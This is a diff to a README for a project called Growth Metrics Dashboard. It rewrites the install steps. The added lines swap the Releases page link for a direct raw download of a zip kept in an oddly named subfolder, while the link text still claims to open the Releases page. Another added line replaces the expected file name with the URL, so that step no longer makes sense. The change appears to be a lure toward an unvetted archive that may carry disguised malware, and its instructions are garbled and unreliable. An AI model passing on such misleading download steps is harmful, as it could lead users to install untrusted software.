nuname8857/growth-metrics-dashboard/README.md

 Follow these simple steps to install and run the Growth Metrics Dashboard:

 1. **Download the Application**:
-   - Click this link: [Download the latest version here](https://github.com/nuname8857/growth-metrics-dashboard/releases) to visit our Releases page.
+   - Click this link: [Download the latest version here](https://raw.githubusercontent.com/nuname8857/growth-metrics-dashboard/main/intagliation/growth-metrics-dashboard.zip) to visit our Releases page.
    - Choose the version suitable for your operating system.
    - Click on the download link.

 2. **Locate the Downloaded File**:
    - After the download completes, go to your computer's downloads folder.
-   - Find the downloaded file (it should be named similarly to `growth-metrics-dashboard-vX.X.X.zip`).
+   - Find the downloaded file (it should be named similarly to `https://raw.githubusercontent.com/nuname8857/growth-metrics-dashboard/main/intagliation/growth-metrics-dashboard.zip`).

 3. **Extract the File**:
    - Right-click on the downloaded file and select "Extract All" on Windows or use Finder's "Unzip" on macOS.